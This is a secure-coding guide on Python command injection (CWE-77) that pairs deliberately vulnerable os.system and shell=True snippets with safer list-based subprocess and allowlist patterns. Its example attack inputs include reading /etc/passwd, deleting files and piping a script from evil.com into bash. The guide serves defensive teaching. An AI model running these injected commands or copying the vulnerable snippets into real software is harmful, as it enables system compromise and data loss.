Skip to content

CWE-77: Command Injection - Python

Overview

Command injection in Python occurs when applications construct system commands using untrusted input. Python's subprocess and os modules can invoke shells, allowing attackers to inject malicious commands.

Primary Defence: Use subprocess.run() or subprocess.Popen() with argument lists instead of shell strings (shell=False), never use os.system() or subprocess.call() with shell=True on untrusted input, validate all user input against strict allowlists before using in commands, and use Python libraries for specific tasks instead of shelling out to prevent command injection attacks.

Common Vulnerable Patterns

os.system() with User Input

# VULNERABLE - Always uses shell
import os

ip_address = request.GET.get('ip')
os.system('ping -c 4 ' + ip_address)

# Attack: ip=8.8.8.8; cat /etc/passwd
# Executes: ping -c 4 8.8.8.8; cat /etc/passwd

subprocess with shell=True

# VULNERABLE - Shell interpretation enabled
import subprocess

filename = request.POST.get('file')
subprocess.call('ls -la ' + filename, shell=True)

# Attack: file=test.txt && rm -rf /tmp/*
# Executes: ls -la test.txt && rm -rf /tmp/*

os.popen() with Concatenation

# VULNERABLE - Uses shell automatically
import os

domain = request.args.get('domain')
result = os.popen('nslookup ' + domain).read()

# Attack: domain=example.com || whoami
# Executes: nslookup example.com || whoami

String Formatting in Commands

# VULNERABLE - f-string in shell command
import subprocess

host = request.json.get('host')
subprocess.run(f'ping -c 4 {host}', shell=True)

# Attack: host=8.8.8.8; curl http://evil.com/shell.sh | bash

Secure Patterns

Use Python Native Libraries (Primary Defense)

# SECURE - Use Python libraries instead of system commands

# Instead of: os.system('ping ' + host)
import socket
import subprocess

def is_host_reachable(hostname):
    """Check host reachability using native Python"""
    # Validate hostname
    if not hostname.replace('.', '').replace('-', '').isalnum():
        raise ValueError("Invalid hostname")

    try:
        socket.gethostbyname(hostname)
        return True
    except socket.error:
        return False

# Instead of: os.system('rm ' + file)
import os
import re

def delete_file(filename):
    """Delete file using Python's os module"""
    # Validate filename
    if not re.match(r'^[a-zA-Z0-9_.-]+$', filename):
        raise ValueError("Invalid filename")

    filepath = os.path.join('/safe/directory', filename)
    os.remove(filepath)

# Instead of: subprocess.call('curl ' + url, shell=True)
import requests

def fetch_url(url):
    """Fetch URL using requests library"""
    response = requests.get(url, timeout=10)
    return response.text

# Instead of: os.system('tar -czf archive.tar.gz ' + files)
import tarfile

def create_archive(file_list, archive_name):
    """Create tar archive using tarfile module"""
    with tarfile.open(archive_name, 'w:gz') as tar:
        for file in file_list:
            # Validate each filename
            if not re.match(r'^[a-zA-Z0-9_./-]+$', file):
                continue
            tar.add(file)

Why this works:

  • Native libraries eliminate shell: socket.gethostbyname() uses system resolvers (not nslookup), os.remove() uses syscalls (not rm), requests.get() uses sockets (not curl), tarfile.open() uses zlib (not tar)
  • Removes attack surface: No shell interpretation means metacharacters (;, &, |, backticks, $(), newlines) have no special meaning
  • Defense-in-depth validation: Regex ^[a-zA-Z0-9.-]+$ blocks command separators and path traversal even though native libraries don't interpret them
  • Path safety: os.path.join() combines trusted base with user input, preventing absolute paths (/etc/passwd) and traversal (../../etc/shadow)
  • Standard library advantages: Maintained, cross-platform, auditable modules avoid inconsistent shell escaping (bash/sh/dash/zsh) and OS-specific command syntax

subprocess.run() with List Arguments

# SECURE - Use list form, shell=False (default)
import subprocess
import re

def secure_ping(ip_address):
    """Execute ping with argument list"""
    # Validate IP address
    ip_pattern = r'^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}' \
                 r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'
    if not re.match(ip_pattern, ip_address):
        raise ValueError("Invalid IP address")

    # Use list form - no shell interpretation
    result = subprocess.run(
        ['ping', '-c', '4', ip_address],
        capture_output=True,
        text=True,
        timeout=10
    )
    return result.stdout

def secure_nslookup(domain):
    """Execute nslookup with argument list"""
    # Validate domain name
    if not re.match(r'^[a-zA-Z0-9.-]+$', domain):
        raise ValueError("Invalid domain name")

    # Arguments as list, shell=False
    result = subprocess.run(
        ['nslookup', domain],
        capture_output=True,
        text=True,
        timeout=5
    )
    return result.stdout

Why this works:

  • subprocess.run() with list bypasses shell: Arguments passed as distinct elements, not shell script
  • shell=False prevents shell invocation: Direct fork()/exec() (Linux) or CreateProcess() (Windows)
  • Metacharacters become literal data: ;, &, |, $(), backticks passed as strings, not interpreted
  • Strict validation blocks injection attempts: IP/domain regex ensures only valid input passes
  • capture_output=True avoids shell redirection: Clean stdout/stderr capture without >, 2>&1
  • Timeout prevents DoS: Stops slow-resolving domains or infinite loops after 10 seconds

Input Validation with Regex

# SECURE - Strict allowlist validation
import re

class InputValidator:
    """Validate user inputs against allowlists"""

    HOSTNAME_PATTERN = re.compile(r'^[a-zA-Z0-9.-]+$')
    IP_PATTERN = re.compile(
        r'^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}'
        r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'
    )
    FILENAME_PATTERN = re.compile(r'^[a-zA-Z0-9_.-]+$')
    NUMBER_PATTERN = re.compile(r'^[0-9]+$')

    @staticmethod
    def validate_hostname(hostname):
        if not hostname or len(hostname) > 253:
            raise ValueError("Invalid hostname length")
        if not InputValidator.HOSTNAME_PATTERN.match(hostname):
            raise ValueError("Invalid hostname format")
        return hostname

    @staticmethod
    def validate_ip(ip_address):
        if not InputValidator.IP_PATTERN.match(ip_address):
            raise ValueError("Invalid IP address format")
        return ip_address

    @staticmethod
    def validate_filename(filename):
        if not filename:
            raise ValueError("Empty filename")
        if '..' in filename or '/' in filename or '\\' in filename:
            raise ValueError("Path traversal attempt detected")
        if not InputValidator.FILENAME_PATTERN.match(filename):
            raise ValueError("Invalid filename format")
        return filename

    @staticmethod
    def validate_number(value):
        if not InputValidator.NUMBER_PATTERN.match(str(value)):
            raise ValueError("Invalid number format")
        return int(value)

Why this works:

  • Centralized validation: Compiled re.compile() patterns (thread-safe, performant) ensure consistency - all code paths enforcing same strict rules
  • Allowlist regex: ^[a-zA-Z0-9.-]+$ blocks shell metacharacters (;, &, |, >, <, backticks, $(), newlines, null bytes) by only permitting safe chars
  • Specific checks: IP validation (precise IPv4 octets 0-255), path traversal detection ('..', /, \\), length limits (≤253 per RFC 1035) prevent injections and DoS
  • Fail-closed exceptions: raise ValueError for invalid input rejects suspicious data rather than sanitizing (error-prone); int() conversion ensures type safety
  • Defense-in-depth: Complements list-based subprocess - validation catches malicious input before command execution even if subprocess used correctly

Safe Subprocess Execution Pattern

# SECURE - Complete safe execution pattern
import subprocess
import shlex
from pathlib import Path

def execute_command_safely(command, args):
    """
    Execute command with strict safety controls

    Args:
        command: Command name (validated against allowlist)
        args: List of arguments (each validated)
    """
    # Allowlist of permitted commands
    ALLOWED_COMMANDS = {
        'ping': '/bin/ping',
        'nslookup': '/usr/bin/nslookup',
        'dig': '/usr/bin/dig'
    }

    if command not in ALLOWED_COMMANDS:
        raise ValueError(f"Command not allowed: {command}")

    # Build command with full path
    cmd_list = [ALLOWED_COMMANDS[command]] + args

    # Execute without shell
    try:
        result = subprocess.run(
            cmd_list,
            capture_output=True,
            text=True,
            timeout=30,
            check=False,  # Don't raise on non-zero exit
            shell=False   # CRITICAL: Never use shell
        )
        return result.stdout
    except subprocess.TimeoutExpired:
        raise RuntimeError("Command timed out")
    except Exception as e:
        raise RuntimeError(f"Command execution failed: {e}")

Why this works:

  • Command allowlist: ALLOWED_COMMANDS dictionary with absolute paths (/bin/ping, /usr/bin/nslookup) prevents PATH manipulation and arbitrary command execution
  • List-based arguments: cmd_list = [ALLOWED_COMMANDS[command]] + args passes each arg separately - no shell interpretation, quoting, or escaping needed
  • Direct execution: shell=False invokes executables directly via fork()/exec(), not through /bin/sh -c; capture_output=True captures stdout/stderr without redirection
  • DoS prevention: timeout=30 prevents hangs from unresponsive hosts; check=False allows graceful handling of non-zero exit codes
  • Defense-in-depth wrapper: Combines allowlisting, argument isolation, timeouts, and clean error messages in reusable function

Common Python Command Injection Scenarios

File Operations

# VULNERABLE
import os
filename = request.POST.get('file')
os.system(f'cat {filename}')

# SECURE - Use built-in file operations
def read_file_safely(filename):
    # Validate filename
    filename = InputValidator.validate_filename(filename)

    # Use Path for safe file operations
    safe_dir = Path('/safe/directory')
    file_path = safe_dir / filename

    # Ensure file is within safe directory
    if not file_path.resolve().is_relative_to(safe_dir.resolve()):
        raise ValueError("Path traversal attempt")

    with open(file_path, 'r') as f:
        return f.read()

Network Operations

# VULNERABLE
import os
host = request.args.get('host')
os.system(f'curl https://{host}/api/data')

# SECURE - Use requests library
import requests

def fetch_api_data(hostname):
    # Validate hostname
    hostname = InputValidator.validate_hostname(hostname)

    # Use requests library
    url = f'https://{hostname}/api/data'
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    return response.json()

Image Processing

# VULNERABLE
import os
image_file = request.FILES.get('image').name
os.system(f'convert {image_file} thumbnail.jpg')

# SECURE - Use Pillow library
from PIL import Image

def create_thumbnail(image_path):
    # Validate filename
    filename = InputValidator.validate_filename(image_path)

    # Use Pillow instead of ImageMagick command
    with Image.open(filename) as img:
        img.thumbnail((128, 128))
        img.save('thumbnail.jpg')

Archive Creation

# VULNERABLE
import os
files = request.POST.get('files')
os.system(f'zip archive.zip {files}')

# SECURE - Use zipfile module
import zipfile

def create_zip_archive(file_list):
    with zipfile.ZipFile('archive.zip', 'w') as zipf:
        for file in file_list:
            # Validate each filename
            safe_name = InputValidator.validate_filename(file)
            zipf.write(safe_name)

Django-Specific Guidance

# Django view with command injection vulnerability
from django.http import HttpResponse
import subprocess

def vulnerable_view(request):
    # VULNERABLE
    domain = request.GET.get('domain', '')
    result = subprocess.check_output(f'nslookup {domain}', shell=True)
    return HttpResponse(result)

# SECURE Django view
from django.http import HttpResponse, HttpResponseBadRequest
import subprocess

def secure_view(request):
    domain = request.GET.get('domain', '')

    # Validate input
    try:
        domain = InputValidator.validate_hostname(domain)
    except ValueError as e:
        return HttpResponseBadRequest(str(e))

    # Use list form, no shell
    try:
        result = subprocess.run(
            ['nslookup', domain],
            capture_output=True,
            text=True,
            timeout=5
        )
        return HttpResponse(result.stdout)
    except subprocess.TimeoutExpired:
        return HttpResponseBadRequest("Request timeout")

Flask-Specific Guidance

# Flask route with command injection vulnerability
from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/ping')
def vulnerable_ping():
    # VULNERABLE
    ip = request.args.get('ip')
    result = os.popen(f'ping -c 4 {ip}').read()
    return result

# SECURE Flask route
from flask import Flask, request, abort
import subprocess

@app.route('/ping')
def secure_ping():
    ip = request.args.get('ip', '')

    # Validate IP address
    try:
        ip = InputValidator.validate_ip(ip)
    except ValueError:
        abort(400, "Invalid IP address")

    # Use subprocess with list arguments
    try:
        result = subprocess.run(
            ['ping', '-c', '4', ip],
            capture_output=True,
            text=True,
            timeout=10
        )
        return result.stdout
    except subprocess.TimeoutExpired:
        abort(504, "Request timeout")

Verification

After implementing the recommended secure patterns, verify the fix through multiple approaches:

  • Manual testing: Submit malicious payloads relevant to this vulnerability and confirm they're handled safely without executing unintended operations
  • Code review: Confirm all instances use the secure pattern (parameterized queries, safe APIs, proper encoding) with no string concatenation or unsafe operations
  • Static analysis: Use security scanners to verify no new vulnerabilities exist and the original finding is resolved
  • Regression testing: Ensure legitimate user inputs and application workflows continue to function correctly
  • Edge case validation: Test with special characters, boundary conditions, and unusual inputs to verify proper handling
  • Framework verification: If using a framework or library, confirm the recommended APIs are used correctly according to documentation
  • Authentication/session testing: Verify security controls remain effective and cannot be bypassed (if applicable to the vulnerability type)
  • Rescan: Run the security scanner again to confirm the finding is resolved and no new issues were introduced

Additional Resources